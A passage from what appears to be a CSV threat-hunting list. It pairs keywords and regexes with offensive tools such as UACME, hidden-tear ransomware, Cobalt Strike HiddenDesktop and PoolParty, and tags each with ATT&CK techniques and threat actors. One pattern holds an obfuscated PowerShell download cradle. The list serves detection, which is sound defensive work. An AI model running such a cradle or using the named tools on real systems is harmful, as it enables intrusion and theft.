Recharge*",".{0,1000}Hey\sDear!\sYou\sHave\sWon\sFree\sRs\s399\sJio\sRecharge.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. 
If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","47142" "*hfiref0x.github.io/Beacon/uac/exec*",".{0,1000}hfiref0x\.github\.io\/Beacon\/uac\/exec.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","1","N/A","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","47143" "*hfiref0x/UACME*",".{0,1000}hfiref0x\/UACME.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","47144" "*hfiref0x/WDExtract*",".{0,1000}hfiref0x\/WDExtract.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","47145" "*Hibr2Dmp.exe*",".{0,1000}Hibr2Dmp\.exe.{0,1000}","offensive_tool_keyword","Hibr2Dmp","Convert hiberfil.sys to a dump file with hibr2dmp (can be used with windbg to exploit lsass dump)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/System/dump_lsass_by_converting_hiberfil_to_dmp.ps1","1","1","N/A","N/A","N/A","2","184","19","2024-12-20T10:22:25Z","2022-12-05T12:40:02Z","47147" 
"*HID\VID_03EB&PID_2401&REV_0100*",".{0,1000}HID\\VID_03EB&PID_2401&REV_0100.{0,1000}","offensive_tool_keyword","Hak5 Rubber Ducky","keystroke injection tool","T1056 - T1204","TA0001 - TA0009","N/A","N/A","Hardware","https://github.com/mthcht/awesome-lists/blob/main/Lists/suspicious_usb_ids_list.csv","1","0","#deviceid","can appear in windows eventid 6416","10","10","936","111","2025-04-22T21:16:31Z","2022-12-11T10:45:11Z","47148" "*HID\VID_03EB&PID_2422&REV_0100*",".{0,1000}HID\\VID_03EB&PID_2422&REV_0100.{0,1000}","offensive_tool_keyword","Hak5 Rubber Ducky","keystroke injection tool","T1056 - T1204","TA0001 - TA0009","N/A","N/A","Hardware","https://github.com/mthcht/awesome-lists/blob/main/Lists/suspicious_usb_ids_list.csv","1","0","#deviceid","can appear in windows eventid 6416","10","10","936","111","2025-04-22T21:16:31Z","2022-12-11T10:45:11Z","47149" "*HID\VID_1B4F&PID_9207*",".{0,1000}HID\\VID_1B4F&PID_9207.{0,1000}","offensive_tool_keyword","Cactus WHID","advanced keystroke injection device","T1056 - T1204","TA0001 - TA0009","N/A","N/A","Hardware","https://github.com/mthcht/awesome-lists/blob/main/Lists/suspicious_usb_ids_list.csv","1","0","#deviceid","can appear in windows eventid 6416","10","10","936","111","2025-04-22T21:16:31Z","2022-12-11T10:45:11Z","47150" "*hidd -EXecUTiOnPO BYpASS -cO ""i`EX ( neW-o`BJE`cT N`ET.`weBcl`IeNT )*",".{0,1000}hidd\s\-EXecUTiOnPO\sBYpASS\s\-cO\s\s\""i\`EX\s\(\s\s\s\sneW\-o\`BJE\`cT\sN\`ET\.\`weBcl\`IeNT\s\s\s\s\).{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","47151" "*Hidden.Desktop.mp4*",".{0,1000}Hidden\.Desktop\.mp4.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often 
referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","N/A","10","10","1213","187","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z","47152" "*hidden_tear_decrypter.Properties.Resources*",".{0,1000}hidden_tear_decrypter\.Properties\.Resources.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","47153" "*HiddenDesktop * *",".{0,1000}HiddenDesktop\s.{0,1000}\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. 
This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","N/A","10","10","1213","187","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z","47154" "*HiddenDesktop.*",".{0,1000}HiddenDesktop\..{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. 
This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","N/A","10","10","1213","187","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z","47155" "*HiddenDesktop.cpp*",".{0,1000}HiddenDesktop\.cpp.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","47156" "*HiddenDesktop.exe*",".{0,1000}HiddenDesktop\.exe.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","1","N/A","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","47157" "*HiddenDesktop.x64.bin*",".{0,1000}HiddenDesktop\.x64\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. 
The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","N/A","10","10","1213","187","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z","47158" "*HiddenDesktop.x86.bin*",".{0,1000}HiddenDesktop\.x86\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. 
This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","N/A","10","10","1213","187","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z","47159" "*HiddenDesktop.zip*",".{0,1000}HiddenDesktop\.zip.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. 
This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","N/A","10","10","1213","187","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z","47160" "*HiddenDesktop_ControlWindow*",".{0,1000}HiddenDesktop_ControlWindow.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","47161" "*hiddenFunctions\upload_file.py*",".{0,1000}hiddenFunctions\\upload_file\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","47162" 
"*hidden-tear-1-master.zip*",".{0,1000}hidden\-tear\-1\-master\.zip.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","1","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","47164" "*hidden-tear-decrypter.csproj*",".{0,1000}hidden\-tear\-decrypter\.csproj.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","1","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","47165" "*hidden-tear-decrypter.exe*",".{0,1000}hidden\-tear\-decrypter\.exe.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","1","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","47166" "*hidden-tear-decrypter.pdb*",".{0,1000}hidden\-tear\-decrypter\.pdb.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","1","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","47167" "*hidden-tear-master.zip*",".{0,1000}hidden\-tear\-master\.zip.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - 
TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","1","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","47168" "*hidden-tear-remake.zip*",".{0,1000}hidden\-tear\-remake\.zip.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","1","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","47169" "*HiddenUser.ps1*",".{0,1000}HiddenUser\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","47170" "*hide-implant*",".{0,1000}hide\-implant.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - 
Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","47171" "*Hijack Remote Desktop session #4 with knowledge of the logged-on user*",".{0,1000}Hijack\sRemote\sDesktop\ssession\s\#4\swith\sknowledge\sof\sthe\slogged\-on\suser.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement","https://github.com/bohops/SharpRDPHijack","1","0","#content","N/A","10","5","480","80","2024-11-28T06:08:58Z","2020-07-06T02:59:46Z","47173" "*HIJACK_DLL_PATH*",".{0,1000}HIJACK_DLL_PATH.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","47174" "*hijack_hunter *",".{0,1000}hijack_hunter\s.{0,1000}","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","0","N/A","N/A","10","10","147","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z","47175" "*hijack_remote_thread*",".{0,1000}hijack_remote_thread.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","47176" "*hijackablepath.c*",".{0,1000}hijackablepath\.c.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","47177" "*hijackablepath.o*",".{0,1000}hijackablepath\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","47178" "*hijackCLSIDpersistence.*",".{0,1000}hijackCLSIDpersistence\..{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","47179" "*hijackDll*WINMM.dll*",".{0,1000}hijackDll.{0,1000}WINMM\.dll.{0,1000}","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. 
A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","47180" "*Hijacked timer queue handle from the target process: *",".{0,1000}Hijacked\stimer\squeue\shandle\sfrom\sthe\starget\sprocess\:\s.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","#content","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","47181" "*Hijacked worker factory handle from the target process: *",".{0,1000}Hijacked\sworker\sfactory\shandle\sfrom\sthe\starget\sprocess\:\s.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","#content","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","47182" "*HijackHunter.csproj*",".{0,1000}HijackHunter\.csproj.{0,1000}","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. 
Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","47183" "*HijackHunter.exe*",".{0,1000}HijackHunter\.exe.{0,1000}","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","47184" "*Hijack-MultipleKeys -dll *",".{0,1000}Hijack\-MultipleKeys\s\-dll\s.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","47185" "*hijackProgDirMissingDll*",".{0,1000}hijackProgDirMissingDll.{0,1000}","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. 
